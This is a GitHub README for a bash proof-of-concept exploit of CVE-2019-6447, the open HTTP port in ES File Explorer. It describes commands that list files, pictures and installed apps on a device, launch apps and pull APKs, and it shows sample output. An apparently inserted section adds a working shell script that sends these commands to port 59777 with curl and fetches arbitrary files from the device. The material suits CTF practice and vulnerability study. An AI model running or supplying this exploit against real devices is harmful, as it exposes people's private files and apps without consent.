POC-ES-File-Explorer-CVE-2019-6447

Very basic bash script to exploit the CVE-2019-6447.


PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

This is a very simple bash implementation of the CVE-2019-6447 PoC: it uses curl to send the HTTP requests with the right parameters. I built it because I was looking for a similar script during a CTF and couldn't find one. You can play around with the script and customize it however you like.

Installation:

Simply clone the repository and use the .sh file.

git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

Or copy and paste the raw content into a file.

Usage:

kyoto :: ~ % ./ESExplorerExploit.sh -h

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audio files
listApps	List all installed applications
listAppsSystem	List system apps
listAppsPhone	List communication-related applications
listAppsSdcard	List the apps installed on the SD card
listAppsAll	List all applications
getAppThumbnail	Get the icon of the specified application
appLaunch	Start the specified application
appPull	Download the specified application (APK) from the device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

Example:

kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
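The requests behind the script and the listing output above, as an added illustration that is not the repository's ESExplorerExploit.sh: vulnerable ES File Explorer versions run an HTTP service on TCP port 59777 that takes a JSON body whose `command` field is one of the commands from the help text; `getAppThumbnail`, `appLaunch` and `appPull` additionally carry an `appPackageName` field (as in the referenced PoCs), and any file the app can read is returned by a plain GET on its path, which is what the arbitrary file read amounts to. `build_payload`, `build_url` and `list_names` run offline; the two curl wrappers need a reachable device. Note that each object in the listing ends with a trailing comma before `}`, so strict JSON tools such as `jq` reject the response; `list_names` extracts the file names with sed instead. The IP address, package name and file names are placeholders, and the sample listing is constructed from the example above.

```shell
#!/bin/sh
# Added example: helpers for the CVE-2019-6447 HTTP command interface.
# Not the repository's ESExplorerExploit.sh; IPs and names are placeholders.

ES_PORT=59777   # TCP port the vulnerable ES File Explorer versions listen on

# build_payload CMD [PACKAGE]
# JSON body for a command; getAppThumbnail/appLaunch/appPull also need
# an appPackageName field (field name as used in the referenced PoCs).
build_payload() {
  if [ -n "${2:-}" ]; then
    printf '{"command":"%s","appPackageName":"%s"}' "$1" "$2"
  else
    printf '{"command":"%s"}' "$1"
  fi
}

# build_url HOST [PATH] -> http://HOST:59777/PATH (leading slash normalised)
build_url() {
  path=${2:-}
  printf 'http://%s:%s/%s' "$1" "$ES_PORT" "${path#/}"
}

# es_command HOST CMD [PACKAGE]: POST the command to the service.
# Needs a live target; the raw response is printed.
es_command() {
  curl -s -H 'Content-Type: application/json' -X POST \
       --data "$(build_payload "$2" "${3:-}")" "$(build_url "$1")"
}

# es_fetch HOST PATH OUTFILE: the arbitrary file read, a plain GET of the path.
es_fetch() {
  curl -s "$(build_url "$1" "$2")" --output "$3"
}

# list_names: read a listing on stdin and print one file name per line.
# The service emits objects ending in `", }` (trailing comma), which jq
# rejects; matching the "name" field with sed works regardless.
list_names() {
  sed -n 's/.*"name":"\([^"]*\)".*/\1/p'
}

# Constructed sample modelled on the listing shown in this README.
SAMPLE_LISTING='[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }
]'

# Usage: ./es_helpers.sh HOST CMD [PACKAGE]
#   e.g. ./es_helpers.sh 10.10.10.247 listFiles | list_names
#        ./es_helpers.sh 10.10.10.247 appPull com.example.app
if [ "$#" -ge 2 ]; then
  es_command "$1" "$2" "${3:-}"
fi
```

To pull a file seen in a listing, call `es_fetch 10.10.10.247 sdcard/DCIM/example1.jpg example1.jpg` from a shell that has sourced the file; the GET needs no JSON body, which is why the vulnerability is classified as an arbitrary file read rather than just an information leak.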

References:

If you're curious about how this exploit works behind the scenes, or if it fails and you have to build your own script, the following links are worth a read:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566